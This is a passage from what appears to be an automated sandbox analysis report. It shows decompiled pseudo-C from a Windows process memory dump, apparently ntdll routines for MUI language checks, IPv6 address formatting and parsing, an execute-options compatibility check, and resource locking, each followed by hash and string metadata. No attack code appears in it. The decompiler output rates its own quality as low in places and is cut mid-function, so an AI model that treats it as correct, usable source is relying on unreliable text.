                                          							 *_v12 = 0;
                                          							E0075E2A8(_v12,  &_v68, _v16);
                                          							if(E00775553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          							_v16 = _v12;
                                          							_t261 = E0076E679(_v12, _t332);
                                          							_pop(_t322);
                                          						}
                                          						_t269 = _v16;
                                          						if( *_v16 != _t318) {
                                          							E0075E2A8(_t322,  &_v68, _t269);
                                          							if(E00775553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          						}
                                          						if(_a4 == _t318) {
                                          							E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          							_v40 = _t318;
                                          							_v20 = _t318;
                                          						}
                                          						if(_v8 != _t318) {
                                          							E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          						}
                                          						_v8 = _t318;
                                          						goto L30;
                                          					}
                                          				}
                                          				_t284 = _v24;
                                          				_t322 = _t284 + 4;
                                          				_push(_t284);
                                          				_v48 = _t322;
                                          				E0077718A(_t284);
                                          				_t339 = _t335 + 4;
                                          				if(_t322 == _t318) {
                                          					_v28 = _t318;
                                          				} else {
                                          					_v28 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          				}
                                          				if(_v28 == _t318) {
                                          					_v48 = _t318;
                                          					goto L58;
                                          				} else {
                                          					E00752340(_v28, _v8, _v24);
                                          					_v16 = _v28;
                                          					_a4 = _t318;
                                          					_t288 = E0076E679(_v28, _t332);
                                          					_t335 = _t339 + 0x14;
                                          					while(1) {
                                          						_v12 = _t288;
                                          						if(_t288 == _t318) {
                                          							break;
                                          						}
                                          						_v12 = _v12 + 2;
                                          						 *_v12 = 0;
                                          						E0075E2A8(_v12,  &_v68, _v16);
                                          						if(E00775553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          						_v16 = _v12;
                                          						_t288 = E0076E679(_v12, _t332);
                                          						_pop(_t322);
                                          					}
                                          					_t296 = _v16;
                                          					if( *_v16 != _t318) {
                                          						E0075E2A8(_t322,  &_v68, _t296);
                                          						if(E00775553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          					}
                                          					if(_a4 == _t318) {
                                          						E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                          						_v48 = _t318;
                                          						_v28 = _t318;
                                          					}
                                          					if(_v8 != _t318) {
                                          						E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					}
                                          					_v8 = _t318;
                                          					goto L17;
                                          				}
                                          			}






































                                          APIs
                                          Strings
                                          • WindowsExcludedProcs, xrefs: 007787C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 00778914
                                          • Kernel-MUI-Number-Allowed, xrefs: 007787E6
                                          • Kernel-MUI-Language-SKU, xrefs: 007789FC
                                          • Kernel-MUI-Language-Allowed, xrefs: 00778827
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: ce9b8578de7136411f065d8a0ff9ea47d04859baed89fcc9c915b9c1c70ad6e3
                                          • Instruction ID: 4d86dd88e29ab23827764064ba8355b6916ea96654b65a300c5fddedc5020bf9
                                          • Opcode Fuzzy Hash: ce9b8578de7136411f065d8a0ff9ea47d04859baed89fcc9c915b9c1c70ad6e3
                                          • Instruction Fuzzy Hash: 89F107B1D00209EFCF51DF94C989DEEB7B9FF08340F10846AE509A7211EB79AA45DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E007913CB(intOrPtr* _a4, intOrPtr _a8) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				intOrPtr _t71;
                                          				signed int _t78;
                                          				signed int _t86;
                                          				char _t90;
                                          				signed int _t91;
                                          				signed int _t96;
                                          				intOrPtr _t108;
                                          				signed int _t114;
                                          				void* _t115;
                                          				intOrPtr _t128;
                                          				intOrPtr* _t129;
                                          				void* _t130;
                                          
                                          				_t129 = _a4;
                                          				_t128 = _a8;
                                          				_t116 = 0;
                                          				_t71 = _t128 + 0x5c;
                                          				_v8 = 8;
                                          				_v20 = _t71;
                                          				if( *_t129 == 0) {
                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                          						goto L5;
                                          					} else {
                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                          						if(_t96 != 0) {
                                          							L38:
                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                          								goto L5;
                                          							} else {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t86 = E00787707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                          								L36:
                                          								return _t128 + _t86 * 2;
                                          							}
                                          						}
                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                          						if(_t114 == 0) {
                                          							L33:
                                          							_t115 = 0x752926;
                                          							L35:
                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                          							_t86 = E00787707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                          							goto L36;
                                          						}
                                          						if(_t114 != 0xffff) {
                                          							_t116 = 0;
                                          							goto L38;
                                          						}
                                          						if(_t114 != 0) {
                                          							_t115 = 0x759cac;
                                          							goto L35;
                                          						}
                                          						goto L33;
                                          					}
                                          				} else {
                                          					L5:
                                          					_a8 = _t116;
                                          					_a4 = _t116;
                                          					_v12 = _t116;
                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                          						if( *(_t129 + 0xa) == 0xfe5e) {
                                          							_v8 = 6;
                                          						}
                                          					}
                                          					_t90 = _v8;
                                          					if(_t90 <= _t116) {
                                          						L11:
                                          						if(_a8 - _a4 <= 1) {
                                          							_a8 = _t116;
                                          							_a4 = _t116;
                                          						}
                                          						_t91 = 0;
                                          						if(_v8 <= _t116) {
                                          							L22:
                                          							if(_v8 < 8) {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t128 = _t128 + E00787707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                          							}
                                          							return _t128;
                                          						} else {
                                          							L14:
                                          							L14:
                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                          								if(_t91 != _t116 && _t91 != _a8) {
                                          									_push(":");
                                          									_push(_t71 - _t128 >> 1);
                                          									_push(_t128);
                                          									_t128 = _t128 + E00787707() * 2;
                                          									_t71 = _v20;
                                          									_t130 = _t130 + 0xc;
                                          								}
                                          								_t78 = E00787707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                          								_t130 = _t130 + 0x10;
                                          							} else {
                                          								_push(L"::");
                                          								_push(_t71 - _t128 >> 1);
                                          								_push(_t128);
                                          								_t78 = E00787707();
                                          								_t130 = _t130 + 0xc;
                                          								_t91 = _a8 - 1;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t128 = _t128 + _t78 * 2;
                                          							_t71 = _v20;
                                          							if(_t91 >= _v8) {
                                          								goto L22;
                                          							}
                                          							_t116 = 0;
                                          							goto L14;
                                          						}
                                          					} else {
                                          						_t108 = 1;
                                          						_v16 = _t129;
                                          						_v24 = _t90;
                                          						do {
                                          							if( *_v16 == _t116) {
                                          								if(_t108 - _v12 > _a8 - _a4) {
                                          									_a4 = _v12;
                                          									_a8 = _t108;
                                          								}
                                          								_t116 = 0;
                                          							} else {
                                          								_v12 = _t108;
                                          							}
                                          							_v16 = _v16 + 2;
                                          							_t108 = _t108 + 1;
                                          							_t26 =  &_v24;
                                          							 *_t26 = _v24 - 1;
                                          						} while ( *_t26 != 0);
                                          						goto L11;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 64d8934264c26cb42c1a92a114b0e12b3216144e2c659005e08f0f8f5fb70820
                                          • Instruction ID: 525183e150b16c868e4e4a1aed8134cfe34b1cc8fa6301d4ca65260ee5d75097
                                          • Opcode Fuzzy Hash: 64d8934264c26cb42c1a92a114b0e12b3216144e2c659005e08f0f8f5fb70820
                                          • Instruction Fuzzy Hash: 126147B1900656EACF34DF59D8808FE7BB5EF98301B98C02DE99647640D37CAA54CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E00787EFD(void* __ecx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				char _v540;
                                          				unsigned int _v544;
                                          				signed int _v548;
                                          				intOrPtr _v552;
                                          				char _v556;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t33;
                                          				void* _t38;
                                          				unsigned int _t46;
                                          				unsigned int _t47;
                                          				unsigned int _t52;
                                          				intOrPtr _t56;
                                          				unsigned int _t62;
                                          				void* _t69;
                                          				void* _t70;
                                          				intOrPtr _t72;
                                          				signed int _t73;
                                          				void* _t74;
                                          				void* _t75;
                                          				void* _t76;
                                          				void* _t77;
                                          
                                          				_t33 =  *0x832088; // 0x76c6953a
                                          				_v8 = _t33 ^ _t73;
                                          				_v548 = _v548 & 0x00000000;
                                          				_t72 = _a4;
                                          				if(E00787F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                          					__eflags = _v548;
                                          					if(_v548 == 0) {
                                          						goto L1;
                                          					}
                                          					_t62 = _t72 + 0x24;
                                          					E007A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                          					_t71 = 0x214;
                                          					_v544 = 0x214;
                                          					E0075DFC0( &_v540, 0, 0x214);
                                          					_t75 = _t74 + 0x20;
                                          					_t46 =  *0x834218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                          					__eflags = _t46;
                                          					if(_t46 == 0) {
                                          						goto L1;
                                          					}
                                          					_t47 = _v544;
                                          					__eflags = _t47;
                                          					if(_t47 == 0) {
                                          						goto L1;
                                          					}
                                          					__eflags = _t47 - 0x214;
                                          					if(_t47 >= 0x214) {
                                          						goto L1;
                                          					}
                                          					_push(_t62);
                                          					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                          					E007A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                          					_t52 = E00760D27( &_v540, L"Execute=1");
                                          					_t76 = _t75 + 0x1c;
                                          					_push(_t62);
                                          					__eflags = _t52;
                                          					if(_t52 == 0) {
                                          						E007A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                          						_t71 =  &_v540;
                                          						_t56 = _t73 + _v544 - 0x218;
                                          						_t77 = _t76 + 0x14;
                                          						_v552 = _t56;
                                          						__eflags = _t71 - _t56;
                                          						if(_t71 >= _t56) {
                                          							goto L1;
                                          						} else {
                                          							goto L10;
                                          						}
                                          						while(1) {
                                          							L10:
                                          							_t62 = E00768375(_t71, 0x20);
                                          							_pop(_t69);
                                          							__eflags = _t62;
                                          							if(__eflags != 0) {
                                          								__eflags = 0;
                                          								 *_t62 = 0;
                                          							}
                                          							E007A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                          							_t77 = _t77 + 0x10;
                                          							E007CE8DB(_t69, _t70, __eflags, _t72, _t71);
                                          							__eflags = _t62;
                                          							if(_t62 == 0) {
                                          								goto L1;
                                          							}
                                          							_t31 = _t62 + 2; // 0x2
                                          							_t71 = _t31;
                                          							__eflags = _t71 - _v552;
                                          							if(_t71 >= _v552) {
                                          								goto L1;
                                          							}
                                          						}
                                          					}
                                          					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                          					_push(3);
                                          					_push(0x55);
                                          					E007A3F92();
                                          					_t38 = 1;
                                          					L2:
                                          					return E0075E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                          				}
                                          				L1:
                                          				_t38 = 0;
                                          				goto L2;
                                          			}

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 007A3F12
                                          Strings
                                          • Execute=1, xrefs: 007A3F5E
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 007A3F75
                                          • ExecuteOptions, xrefs: 007A3F04
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 007A3F4A
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 007A3EC4
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 007AE345
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 007AE2FB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: d94f4c5561c8655b2131c5916fef7299bb71663a3b12eac7ed1899079fb70a9f
                                          • Instruction ID: 6b8a040df6364a84c5fa0d8309c37bfa40a076368d5868d037d57a2aedbd7d09
                                          • Opcode Fuzzy Hash: d94f4c5561c8655b2131c5916fef7299bb71663a3b12eac7ed1899079fb70a9f
                                          • Instruction Fuzzy Hash: 5941EC7168020CBADF20EE94DCC9FDA73BCAB55705F140599B605E6081E678EB46CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00790B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				void* _t108;
                                          				void* _t116;
                                          				char _t120;
                                          				short _t121;
                                          				void* _t128;
                                          				intOrPtr* _t130;
                                          				char _t132;
                                          				short _t133;
                                          				intOrPtr _t141;
                                          				signed int _t156;
                                          				signed int _t174;
                                          				intOrPtr _t177;
                                          				intOrPtr* _t179;
                                          				intOrPtr _t180;
                                          				void* _t183;
                                          
                                          				_t179 = _a4;
                                          				_t141 =  *_t179;
                                          				_v16 = 0;
                                          				_v28 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v12 = 0;
                                          				_v32 = 0;
                                          				_v20 = 0;
                                          				if(_t141 == 0) {
                                          					L41:
                                          					 *_a8 = _t179;
                                          					_t180 = _v24;
                                          					if(_t180 != 0) {
                                          						if(_t180 != 3) {
                                          							goto L6;
                                          						}
                                          						_v8 = _v8 + 1;
                                          					}
                                          					_t174 = _v32;
                                          					if(_t174 == 0) {
                                          						if(_v8 == 7) {
                                          							goto L43;
                                          						}
                                          						goto L6;
                                          					}
                                          					L43:
                                          					if(_v16 != 1) {
                                          						if(_v16 != 2) {
                                          							goto L6;
                                          						}
                                          						 *((short*)(_a12 + _v20 * 2)) = 0;
                                          						L47:
                                          						if(_t174 != 0) {
                                          							E00768980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                          							_t116 = 8;
                                          							E0075DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                          						}
                                          						return 0;
                                          					}
                                          					if(_t180 != 0) {
                                          						if(_v12 > 3) {
                                          							goto L6;
                                          						}
                                          						_t120 = E00790CFA(_v28, 0, 0xa);
                                          						_t183 = _t183 + 0xc;
                                          						if(_t120 > 0xff) {
                                          							goto L6;
                                          						}
                                          						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                          						goto L47;
                                          					}
                                          					if(_v12 > 4) {
                                          						goto L6;
                                          					}
                                          					_t121 = E00790CFA(_v28, _t180, 0x10);
                                          					_t183 = _t183 + 0xc;
                                          					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                          					goto L47;
                                          				} else {
                                          					while(1) {
                                          						_t123 = _v16;
                                          						if(_t123 == 0) {
                                          							goto L7;
                                          						}
                                          						_t108 = _t123 - 1;
                                          						if(_t108 != 0) {
                                          							goto L1;
                                          						}
                                          						_t178 = _t141;
                                          						if(E007906BA(_t108, _t141) == 0 || _t135 == 0) {
                                          							if(E007906BA(_t135, _t178) == 0 || E00790A5B(_t136, _t178) == 0) {
                                          								if(_t141 != 0x3a) {
                                          									if(_t141 == 0x2e) {
                                          										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                          											goto L41;
                                          										} else {
                                          											_v24 = _v24 + 1;
                                          											L27:
                                          											_v16 = _v16 & 0x00000000;
                                          											L28:
                                          											if(_v28 == 0) {
                                          												goto L20;
                                          											}
                                          											_t177 = _v24;
                                          											if(_t177 != 0) {
                                          												if(_v12 > 3) {
                                          													L6:
                                          													return 0xc000000d;
                                          												}
                                          												_t132 = E00790CFA(_v28, 0, 0xa);
                                          												_t183 = _t183 + 0xc;
                                          												if(_t132 > 0xff) {
                                          													goto L6;
                                          												}
                                          												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                          												goto L20;
                                          											}
                                          											if(_v12 > 4) {
                                          												goto L6;
                                          											}
                                          											_t133 = E00790CFA(_v28, 0, 0x10);
                                          											_t183 = _t183 + 0xc;
                                          											_v20 = _v20 + 1;
                                          											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                          											goto L20;
                                          										}
                                          									}
                                          									goto L41;
                                          								}
                                          								if(_v24 > 0 || _v8 > 6) {
                                          									goto L41;
                                          								} else {
                                          									_t130 = _t179 + 1;
                                          									if( *_t130 == _t141) {
                                          										if(_v32 != 0) {
                                          											goto L41;
                                          										}
                                          										_v32 = _v8 + 1;
                                          										_t156 = 2;
                                          										_v8 = _v8 + _t156;
                                          										L34:
                                          										_t179 = _t130;
                                          										_v16 = _t156;
                                          										goto L28;
                                          									}
                                          									_v8 = _v8 + 1;
                                          									goto L27;
                                          								}
                                          							} else {
                                          								_v12 = _v12 + 1;
                                          								if(_v24 > 0) {
                                          									goto L41;
                                          								}
                                          								_a7 = 1;
                                          								goto L20;
                                          							}
                                          						} else {
                                          							_v12 = _v12 + 1;
                                          							L20:
                                          							_t179 = _t179 + 1;
                                          							_t141 =  *_t179;
                                          							if(_t141 == 0) {
                                          								goto L41;
                                          							}
                                          							continue;
                                          						}
                                          						L7:
                                          						if(_t141 == 0x3a) {
                                          							if(_v24 > 0 || _v8 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t130 = _t179 + 1;
                                          								if( *_t130 != _t141) {
                                          									goto L41;
                                          								}
                                          								_v20 = _v20 + 1;
                                          								_t156 = 2;
                                          								_v32 = 1;
                                          								_v8 = _t156;
                                          								 *((short*)(_a12 + _v20 * 2)) = 0;
                                          								goto L34;
                                          							}
                                          						}
                                          						L8:
                                          						if(_v8 > 7) {
                                          							goto L41;
                                          						}
                                          						_t142 = _t141;
                                          						if(E007906BA(_t123, _t141) == 0 || _t124 == 0) {
                                          							if(E007906BA(_t124, _t142) == 0 || E00790A5B(_t125, _t142) == 0 || _v24 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t128 = 1;
                                          								_a7 = 1;
                                          								_v28 = _t179;
                                          								_v16 = 1;
                                          								_v12 = 1;
                                          								L39:
                                          								if(_v16 == _t128) {
                                          									goto L20;
                                          								}
                                          								goto L28;
                                          							}
                                          						} else {
                                          							_a7 = 0;
                                          							_v28 = _t179;
                                          							_v16 = 1;
                                          							_v12 = 1;
                                          							goto L20;
                                          						}
                                          					}
                                          				}
                                          				L1:
                                          				_t123 = _t108 == 1;
                                          				if(_t108 == 1) {
                                          					goto L8;
                                          				}
                                          				_t128 = 1;
                                          				goto L39;
                                          			}


























                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 02ca4966c9e4d626cc6e30b786d3cf5bc152c8cae27edc8fa855d7040fa470c0
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: D3A19D7592430ADFCF24CF64E8496FEB7B5EF16304F24856AD812A7241D7389A41CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00790554(signed int _a4, char _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int* _t49;
                                          				signed int _t51;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t63;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				void* _t69;
                                          				signed int _t70;
                                          				void* _t75;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				void* _t86;
                                          				signed int _t93;
                                          				signed int _t96;
                                          				intOrPtr _t105;
                                          				signed int _t107;
                                          				void* _t110;
                                          				signed int _t115;
                                          				signed int* _t119;
                                          				void* _t125;
                                          				void* _t126;
                                          				signed int _t128;
                                          				signed int _t130;
                                          				signed int _t138;
                                          				signed int _t144;
                                          				void* _t158;
                                          				void* _t159;
                                          				void* _t160;
                                          
                                          				_t96 = _a4;
                                          				_t115 =  *(_t96 + 0x28);
                                          				_push(_t138);
                                          				if(_t115 < 0) {
                                          					_t105 =  *[fs:0x18];
                                          					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                          					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                          						goto L6;
                                          					} else {
                                          						__eflags = _t115 | 0xffffffff;
                                          						asm("lock xadd [eax], edx");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L6:
                                          					_push(_t128);
                                          					while(1) {
                                          						L7:
                                          						__eflags = _t115;
                                          						if(_t115 >= 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          							_t49 = _t96 + 0x1c;
                                          							_t106 = 1;
                                          							asm("lock xadd [edx], ecx");
                                          							_t115 =  *(_t96 + 0x28);
                                          							__eflags = _t115;
                                          							if(_t115 < 0) {
                                          								L23:
                                          								_t130 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008301c0;
                                          									_push(_t144);
                                          									_push(0);
                                          									_t51 = E0074F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                          									__eflags = _t51 - 0x102;
                                          									if(_t51 != 0x102) {
                                          										break;
                                          									}
                                          									_t106 =  *(_t144 + 4);
                                          									_t126 =  *_t144;
                                          									_t86 = E00794FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                          									_push(_t126);
                                          									_push(_t86);
                                          									E007A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                          									E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          									_t130 = _t130 + 1;
                                          									_t160 = _t158 + 0x28;
                                          									__eflags = _t130 - 2;
                                          									if(__eflags > 0) {
                                          										E007D217A(_t106, __eflags, _t96);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									E007A3F92();
                                          									_t158 = _t160 + 0xc;
                                          								}
                                          								__eflags = _t51;
                                          								if(__eflags < 0) {
                                          									_push(_t51);
                                          									E00793915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                          									asm("int3");
                                          									while(1) {
                                          										L32:
                                          										__eflags = _a8;
                                          										if(_a8 == 0) {
                                          											break;
                                          										}
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          										_t119 = _t96 + 0x24;
                                          										_t107 = 1;
                                          										asm("lock xadd [eax], ecx");
                                          										_t56 =  *(_t96 + 0x28);
                                          										_a4 = _t56;
                                          										__eflags = _t56;
                                          										if(_t56 != 0) {
                                          											L40:
                                          											_t128 = 0;
                                          											__eflags = 0;
                                          											while(1) {
                                          												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                          												asm("sbb esi, esi");
                                          												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008301c0;
                                          												_push(_t138);
                                          												_push(0);
                                          												_t58 = E0074F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                          												__eflags = _t58 - 0x102;
                                          												if(_t58 != 0x102) {
                                          													break;
                                          												}
                                          												_t107 =  *(_t138 + 4);
                                          												_t125 =  *_t138;
                                          												_t75 = E00794FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                          												_push(_t125);
                                          												_push(_t75);
